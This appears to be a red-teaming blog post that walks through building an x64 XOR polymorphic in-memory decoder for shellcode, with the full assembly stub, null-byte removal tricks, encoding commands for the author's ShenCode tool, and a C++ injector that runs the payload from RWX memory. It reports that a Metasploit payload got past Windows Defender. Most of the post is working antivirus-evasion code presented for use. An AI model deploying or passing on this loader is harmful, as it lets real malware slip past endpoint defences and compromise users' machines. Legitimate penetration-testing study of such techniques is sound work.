Red-teaming and penetration tests often require virus scanners to be bypassed in order to effectively detect security vulnerabilities. In the last part we looked at disguising shellcode as a UUID in the source code. This worked well for the file itself, but the shellcode was recognised in memory and blocked.
We now want to solve this with a polymorphic in-memory decoder: A shellcode that decodes shellcode.
I have taken the XOR decoder from doyler.net and adapted it to the x64 architecture. This was quite simple, as only the corresponding registers had to be renamed. The decoder starts with this instruction:
_start: jmp short call_decoder ; Begin of JMP-CALL-POP
JMP-CALL-POP is a technique that lets code find the address of its own data at runtime, so it runs regardless of where it is loaded in memory. In this first step, we jump to the label call_decoder:
call_decoder:
    call decoder ; pushes the address of the next instruction (the shellcode) onto the stack
    ; The encoded shellcode
    Shellcode: db 0x6a,0x77,0xb6...
Here we see that the CALL instruction directly calls another part of the programme. As soon as this happens, the address of the next instruction (in our case the shellcode) is pushed onto the stack, and RSP points to this saved address.
decoder: pop rsi ; Move pointer to encoded shellcode into RSI from the stack
In the called part of the programme, we pop the pointer from the stack into the register RSI and now know where our shellcode is located in memory.
Now we move on to the actual decryption routine:
decode:
    xor byte [rsi], 0x3F ; The byte RSI points to will be XORed with 0x3F
    jz Shellcode ; jump out of the loop if 0: [RSI] xor 0x3F = 0
    inc rsi ; increment RSI to decode the next byte
    jmp short decode ; loop until each byte was decoded
xor byte [rsi], 0x3F decodes the byte that RSI points to. In this case, this is the first byte of the shellcode. The key for decoding is 0x3F and must match the key that was used for encoding.
jz Shellcode then checks whether the decoded byte is 0x00. The XOR instruction sets the zero flag when its result is 0, so no separate comparison is needed.
If the byte is not 0x00, execution continues with the next instruction: inc rsi. RSI is incremented and thus points to the next byte in the shellcode, which is decoded during the next iteration. jmp short decode jumps back to the beginning of the loop.
If the decoded byte is 0x00, the loop ends and the shellcode is executed. It is important to append the key to the end of the encoded shellcode here, because:
0x3F XOR 0x3F = 0x00
This marks the end of the shellcode and interrupts the loop. We therefore do not need an additional counter.
jz Shellcode now jumps directly to our decoded shellcode and executes it.
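The loop logic can also be modelled outside of assembly. The following is a minimal Python sketch, not code from the decoder itself: the function name decode_until_zero and the sample data are assumptions made for illustration, and the data is harmless ASCII text rather than shellcode. It mirrors the four instructions of the loop: XOR the current byte, stop if the result is 0x00, otherwise advance to the next byte.

```python
KEY = 0x3F  # same key as in the decoder above


def decode_until_zero(buf: bytearray, key: int = KEY) -> int:
    """Decode buf in place and return the index at which the loop stopped."""
    i = 0
    while True:
        buf[i] ^= key      # xor byte [rsi], key
        if buf[i] == 0:    # jz Shellcode
            return i
        i += 1             # inc rsi / jmp short decode


# Illustrative data only: plain text, XOR-encoded, with the key appended as terminator.
plain = b"hello"
encoded = bytearray(b ^ KEY for b in plain) + bytearray([KEY])

stop = decode_until_zero(encoded)
print(stop, bytes(encoded[:stop]))
```

Without the appended key byte, this sketch would run past the end of the buffer and raise an IndexError. The assembly loop has no such bounds check and would simply keep decoding whatever follows in memory.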
We want to execute the calc.exe payload from this blog post. However, this still contains 0 bytes, which prevent decoding. Why is this the case? Here is an example:
# Encoding
XOR Key: 0x3F
Byte: 0x00
0x00 XOR 0x3F = 0x3F
# Decoding
XOR Key: 0x3F
Byte: 0x3F
0x3F XOR 0x3F = 0x00
A 0-byte in the original payload would thus abort the decoding process early, since jz Shellcode would regard it as the signal to terminate. We therefore need to make a few modifications.
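Before encoding, it can help to list where such bytes occur. The following is a small Python sketch under stated assumptions: the helper name zero_offsets is hypothetical and not part of ShenCode, and the sample bytes are made up for illustration rather than taken from the real payload.

```python
def zero_offsets(raw: bytes) -> list[int]:
    """Return the offsets of all 0x00 bytes in raw."""
    return [i for i, b in enumerate(raw) if b == 0]


# Hypothetical sample bytes, not the real payload.
sample = bytes([0x48, 0x31, 0xC0, 0x00, 0x90, 0x00])
print(zero_offsets(sample))
```

Every offset reported this way marks a position where the decoder loop would stop too early.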
The fix for the GS register from the previous post only removes two of the three 0 bytes. This was sufficient for the previous tests. A small change brings us to our goal here:
xor rax, rax
mov al, 60h
mov rax, gs:[rax] ; 65 48 8b 00
change to:
xor rax, rax
mov rax, gs:[rax+0x60] ; 65 48 8b 40 60
This also reduces the size of our shellcode a little.
When searching for Kernel32Base we dereference the register RAX directly, without an offset. This also results in a 0 byte. Here, however, we can use the register RBX as an intermediate and thus avoid the 0 bytes.
mov rax, [rax] ; 48 8b 00
mov rax, [rax] ; 48 8b 00
change to:
mov rbx, [rax] ; 48 8b 18
mov rax, [rbx] ; 48 8b 03
jmp short InvokeWinExec ; eb 00
Here the code jumps to the next instruction. As execution continues there even without the JMP, we can comment out the line.
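The encodings quoted in the comments above can be checked mechanically. The following is a minimal Python sketch that only uses the byte sequences already listed in this post; the dictionary layout and variable names are assumptions for illustration.

```python
# Encodings copied from the comments in the listings above.
encodings = {
    "mov rax, gs:[rax]": "65 48 8b 00",
    "mov rax, gs:[rax+0x60]": "65 48 8b 40 60",
    "mov rax, [rax]": "48 8b 00",
    "mov rbx, [rax]": "48 8b 18",
    "mov rax, [rbx]": "48 8b 03",
    "jmp short InvokeWinExec": "eb 00",
}

# True for every instruction whose encoding contains a 0x00 byte.
has_zero = {insn: 0 in bytes.fromhex(hexstr) for insn, hexstr in encodings.items()}

for insn, flag in has_zero.items():
    print(f"{insn:26} {'contains 0x00' if flag else 'ok'}")
```

The three original variants are flagged, while the replacements are not.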
We can now assemble the code and get opcodes without 0 bytes.
nasm -f win64 calc.asm -o calc.o
We now need to edit the opcodes a little in order to be able to use them in the decoder. I use my shellcode tool ShenCode for this:
python shencode.py extract -i calc.o -o calc.raw -fb 60 -lb 311
...
python shencode.py xorencode -i calc.raw -o calc.xor -k 63
...
python shencode.py formatout -i calc.xor -s cs
[*] processing shellcode format...
0x6a,0x77,0xb6, ... 0x07,0x77,0xbc,0xfb,0x27,0x77,0xbc,0xfb,0x37,0x62
[+] DONE!
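Step by step:
1. Extract the shellcode from calc.o and save it in calc.raw (from offset 60 to 311).
2. Encode calc.raw with the XOR key 63 and save the result in calc.xor. 63 decimal corresponds to 3F hexadecimal.
3. Print calc.xor as formatted bytes (formatout -s cs).
We save the output, remove the line breaks and append our “magic byte” 0x3F at the end.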
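The relationship between the decimal key on the command line and the hexadecimal key in the decoder is easy to verify. The following is a short Python sketch; the variable names are assumptions, and the three sample bytes are only the first bytes of the output shown above, standing in for the full encoded payload.

```python
key = 63
print(hex(key))  # the decimal key written in hexadecimal

# First three bytes of the formatted output above, standing in for the full payload.
encoded = bytes([0x6A, 0x77, 0xB6])

# Append the key as the terminating "magic byte".
with_terminator = encoded + bytes([key])
print(",".join(f"0x{b:02x}" for b in with_terminator))
```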
Now we can add our payload to the XOR decoder. To do this, we paste the previously prepared bytes into the last line of the XOR decoder, the db directive:
; The encoded shellcode
Shellcode: db 0x6a,0x77,0xb6,...0x37,0x62,0x3f
We also check whether the XOR key matches:
decode: xor byte [rsi], 0x3F
If everything is correct, we compile our decoder:
nasm -f win64 xor-decoder.asm -o xor-decoder.o
We then search for the shellcode offsets, extract our code and prepare it for our Inject.cpp file:
python shencode.py formatout -i xor-decoder.o -s inspect
0x00000048: 00 00 00 00 00 00 00 00
0x00000056: 20 00 50 60 eb 0b 5e 80 Offset=60
0x00000064: 36 3f 74 0a 48 ff c6 eb
...
0x00000320: bc fb 27 77 bc fb 37 62
0x00000328: 3f 2e 66 69 6c 65 00 00 Offset=329
0x00000336: 00 00 00 00 00 fe ff 00

python shencode.py extract -i xor-decoder.o -o xor-decoder.stub -fb 60 -lb 329
[*] try to open file
[+] reading xor-decoder.o successful!
[*] cutting shellcode from 60 to 329
[+] written shellcode to xor-decoder.stub
[+] DONE!

python shencode.py formatout -i xor-decoder.stub -s c
[*] processing shellcode format...
"\xeb\x0b\x5e...\x37\x62\x3f"";
[+] DONE!
We can now insert the bytes we have just prepared into our injector programme and compile it.
#include <stdio.h>
#include <windows.h>
#include <iostream>
#pragma warning

unsigned char payload[] = "\xeb\x0b\x5e...\x37\x62\x3f";

int main() {
    size_t byteArrayLength = sizeof(payload);
    std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl;
    void* (*memcpyPtr) (void*, const void*, size_t);
    void* exec = VirtualAlloc(0, byteArrayLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpyPtr = &memcpy;
    memcpyPtr(exec, payload, byteArrayLength);
    ((void(*)())exec)();
    return 0;
}
For testing purposes, I started a debugger and navigated to the memory area of the XOR decoder. While stepping through the code, you can see how the instructions in the lower area are decoded one by one. In the images, this is visible below the call statement (which corresponds to Shellcode: db ...).
The animation above shows the decoding loop, while the shellcode in the lower area is decoded step by step.
To simplify the process, I have integrated the XOR stub as a template in ShenCode. With two commands, we generate an XOR in-memory decoder:
python shencode.py xorencode -i input.raw -o xor.out --key 63
python shencode.py xorpoly -i xor.out -o stub.raw --key 63
The XOR decoder effectively conceals the shellcode in memory until it is decoded. In combination with other obfuscation techniques, this can be a good helper for penetration tests. During my test, even the Metasploit payload was not detected by Windows Defender.